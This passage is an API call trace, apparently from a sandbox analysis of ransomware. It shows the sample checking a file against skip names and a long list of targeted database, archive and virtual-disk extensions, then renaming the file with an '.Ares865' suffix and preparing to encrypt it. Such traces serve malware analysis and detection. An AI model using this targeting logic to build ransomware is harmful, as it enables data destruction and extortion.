[0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0058.531] lstrlenW (lpString="Desktop.ini") returned 11 [0058.531] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk") returned 84 [0058.531] lstrcpyW (in: lpString1=0x2cce486, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0058.531] lstrlenW (lpString="Desktop.ini") returned 11 [0058.531] lstrlenW (lpString="Ares865") returned 7 [0058.531] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.531] lstrlenW (lpString=".dll") returned 4 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0058.531] lstrlenW (lpString=".lnk") returned 4 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0058.531] lstrlenW (lpString=".ini") returned 4 [0058.532] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0058.532] lstrlenW (lpString=".sys") returned 4 [0058.532] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0058.532] lstrlenW (lpString="Desktop.ini") returned 11 [0058.532] lstrlenW (lpString="bak") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.532] lstrlenW (lpString="ba_") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.532] lstrlenW (lpString="dbb") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.532] lstrlenW (lpString="vmdk") returned 4 [0058.532] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.532] lstrlenW (lpString="rar") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.532] lstrlenW (lpString="zip") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.532] lstrlenW (lpString="tgz") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.532] lstrlenW (lpString="vbox") returned 4 [0058.532] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.532] lstrlenW (lpString="vdi") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.532] lstrlenW (lpString="vhd") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.532] lstrlenW (lpString="vhdx") returned 4 [0058.532] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.532] lstrlenW (lpString="avhd") returned 4 [0058.532] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.532] lstrlenW (lpString="db") returned 2 [0058.532] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.532] lstrlenW (lpString="db2") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.532] lstrlenW (lpString="db3") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.532] lstrlenW (lpString="dbf") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.532] lstrlenW (lpString="mdf") returned 3 [0058.532] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.533] lstrlenW (lpString="mdb") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.533] lstrlenW (lpString="sql") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.533] lstrlenW (lpString="sqlite") returned 6 [0058.533] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.533] lstrlenW (lpString="sqlite3") returned 7 [0058.533] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.533] lstrlenW (lpString="sqlitedb") returned 8 [0058.533] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.533] lstrlenW (lpString="xml") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.533] lstrlenW (lpString="$er") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.533] lstrlenW (lpString="4dd") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.533] lstrlenW (lpString="4dl") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.533] lstrlenW (lpString="^^^") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.533] lstrlenW (lpString="abs") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.533] lstrlenW (lpString="abx") returned 3 [0058.533] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.533] lstrlenW (lpString="accdb") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.533] lstrlenW (lpString="accdc") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.533] lstrlenW (lpString="accde") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.533] lstrlenW (lpString="accdr") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.533] lstrlenW (lpString="accdt") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.533] lstrlenW (lpString="accdw") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.533] lstrlenW (lpString="accft") returned 5 [0058.533] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.534] lstrlenW (lpString="adb") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.534] lstrlenW (lpString="adb") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.534] lstrlenW (lpString="ade") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.534] lstrlenW (lpString="adf") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.534] lstrlenW (lpString="adn") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.534] lstrlenW (lpString="adp") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.534] lstrlenW (lpString="alf") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.534] lstrlenW (lpString="ask") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.534] lstrlenW (lpString="btr") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.534] lstrlenW (lpString="cat") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.534] lstrlenW (lpString="cdb") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.534] lstrlenW (lpString="ckp") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.534] lstrlenW (lpString="cma") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.534] lstrlenW (lpString="cpd") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.534] lstrlenW (lpString="dacpac") returned 6 [0058.534] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.534] lstrlenW (lpString="dad") returned 3 [0058.534] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.534] lstrlenW (lpString="dadiagrams") returned 10 [0058.534] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.534] lstrlenW (lpString="daschema") returned 8 [0058.534] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.535] lstrlenW (lpString="db-journal") returned 10 [0058.535] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.535] lstrlenW (lpString="db-shm") returned 6 [0058.535] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.535] lstrlenW (lpString="db-wal") returned 6 [0058.535] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.535] lstrlenW (lpString="dbc") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.535] lstrlenW (lpString="dbs") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.535] lstrlenW (lpString="dbt") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.535] lstrlenW (lpString="dbv") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.535] lstrlenW (lpString="dbx") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.535] lstrlenW (lpString="dcb") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.535] lstrlenW (lpString="dct") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.535] lstrlenW (lpString="dcx") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.535] lstrlenW (lpString="ddl") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.535] lstrlenW (lpString="dlis") returned 4 [0058.535] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.535] lstrlenW (lpString="dp1") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.535] lstrlenW (lpString="dqy") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.535] lstrlenW (lpString="dsk") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.535] lstrlenW (lpString="dsn") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.535] lstrlenW (lpString="dtsx") returned 4 [0058.535] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.535] lstrlenW (lpString="dxl") returned 3 [0058.535] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.536] lstrlenW (lpString="eco") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.536] lstrlenW (lpString="ecx") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.536] lstrlenW (lpString="edb") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.536] lstrlenW (lpString="epim") returned 4 [0058.536] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.536] lstrlenW (lpString="fcd") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.536] lstrlenW (lpString="fdb") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.536] lstrlenW (lpString="fic") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.536] lstrlenW (lpString="flexolibrary") returned 12 [0058.536] lstrlenW (lpString="fm5") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.536] lstrlenW (lpString="fmp") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.536] lstrlenW (lpString="fmp12") returned 5 [0058.536] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.536] lstrlenW (lpString="fmpsl") returned 5 [0058.536] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.536] lstrlenW (lpString="fol") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.536] lstrlenW (lpString="fp3") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.536] lstrlenW (lpString="fp4") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.536] lstrlenW (lpString="fp5") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.536] lstrlenW (lpString="fp7") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.536] lstrlenW (lpString="fpt") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.536] lstrlenW (lpString="frm") returned 3 [0058.536] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.536] lstrlenW (lpString="gdb") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.537] lstrlenW (lpString="gdb") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.537] lstrlenW (lpString="grdb") returned 4 [0058.537] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.537] lstrlenW (lpString="gwi") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.537] lstrlenW (lpString="hdb") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.537] lstrlenW (lpString="his") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.537] lstrlenW (lpString="ib") returned 2 [0058.537] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.537] lstrlenW (lpString="idb") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.537] lstrlenW (lpString="ihx") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.537] lstrlenW (lpString="itdb") returned 4 [0058.537] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.537] lstrlenW (lpString="itw") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.537] lstrlenW (lpString="jet") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.537] lstrlenW (lpString="jtx") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.537] lstrlenW (lpString="kdb") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.537] lstrlenW (lpString="kexi") returned 4 [0058.537] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.537] lstrlenW (lpString="kexic") returned 5 [0058.537] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.537] lstrlenW (lpString="kexis") returned 5 [0058.537] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.537] lstrlenW (lpString="lgc") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.537] lstrlenW (lpString="lwx") returned 3 [0058.537] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.537] lstrlenW (lpString="maf") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.538] lstrlenW (lpString="maq") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.538] lstrlenW (lpString="mar") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.538] lstrlenW (lpString="marshal") returned 7 [0058.538] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.538] lstrlenW (lpString="mas") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.538] lstrlenW (lpString="mav") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.538] lstrlenW (lpString="maw") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.538] lstrlenW (lpString="mdbhtml") returned 7 [0058.538] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.538] lstrlenW (lpString="mdn") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.538] lstrlenW (lpString="mdt") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.538] lstrlenW (lpString="mfd") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.538] lstrlenW (lpString="mpd") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.538] lstrlenW (lpString="mrg") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.538] lstrlenW (lpString="mud") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.538] lstrlenW (lpString="mwb") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.538] lstrlenW (lpString="myd") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.538] lstrlenW (lpString="ndf") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.538] lstrlenW (lpString="nnt") returned 3 [0058.538] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.538] lstrlenW (lpString="nrmlib") returned 6 [0058.538] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.539] lstrlenW (lpString="ns2") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.539] lstrlenW (lpString="ns3") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.539] lstrlenW (lpString="ns4") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.539] lstrlenW (lpString="nsf") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.539] lstrlenW (lpString="nv") returned 2 [0058.539] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.539] lstrlenW (lpString="nv2") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.539] lstrlenW (lpString="nwdb") returned 4 [0058.539] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.539] lstrlenW (lpString="nyf") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.539] lstrlenW (lpString="odb") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.539] lstrlenW (lpString="odb") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.539] lstrlenW (lpString="oqy") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.539] lstrlenW (lpString="ora") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.539] lstrlenW (lpString="orx") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.539] lstrlenW (lpString="owc") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.539] lstrlenW (lpString="p96") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.539] lstrlenW (lpString="p97") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.539] lstrlenW (lpString="pan") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.539] lstrlenW (lpString="pdb") returned 3 [0058.539] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.539] lstrlenW (lpString="pdm") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.540] lstrlenW (lpString="pnz") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.540] lstrlenW (lpString="qry") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.540] lstrlenW (lpString="qvd") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.540] lstrlenW (lpString="rbf") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.540] lstrlenW (lpString="rctd") returned 4 [0058.540] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.540] lstrlenW (lpString="rod") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.540] lstrlenW (lpString="rodx") returned 4 [0058.540] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.540] lstrlenW (lpString="rpd") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.540] lstrlenW (lpString="rsd") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.540] lstrlenW (lpString="sas7bdat") returned 8 [0058.540] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.540] lstrlenW (lpString="sbf") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.540] lstrlenW (lpString="scx") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.540] lstrlenW (lpString="sdb") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.540] lstrlenW (lpString="sdc") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.540] lstrlenW (lpString="sdf") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.540] lstrlenW (lpString="sis") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.540] lstrlenW (lpString="spq") returned 3 [0058.540] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.540] lstrlenW (lpString="te") returned 2 [0058.540] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.540] lstrlenW (lpString="teacher") returned 7 [0058.541] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.541] lstrlenW (lpString="tmd") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.541] lstrlenW (lpString="tps") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.541] lstrlenW (lpString="trc") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.541] lstrlenW (lpString="trc") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.541] lstrlenW (lpString="trm") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.541] lstrlenW (lpString="udb") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.541] lstrlenW (lpString="udl") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.541] lstrlenW (lpString="usr") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.541] lstrlenW (lpString="v12") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.541] lstrlenW (lpString="vis") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.541] lstrlenW (lpString="vpd") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.541] lstrlenW (lpString="vvv") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.541] lstrlenW (lpString="wdb") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.541] lstrlenW (lpString="wmdb") returned 4 [0058.541] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.541] lstrlenW (lpString="wrk") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.541] lstrlenW (lpString="xdb") returned 3 [0058.541] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.542] lstrlenW (lpString="xld") returned 3 [0058.542] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.542] lstrlenW (lpString="xmlff") returned 5 [0058.542] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.542] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865") returned 86 [0058.542] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.543] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.544] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=738) returned 1 [0058.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.544] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.545] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x120 [0058.546] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0x190000 [0058.554] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.554] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.554] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.555] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.555] CloseHandle (hObject=0x120) returned 1 [0058.555] CloseHandle (hObject=0x15c) returned 1 [0058.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d98300, 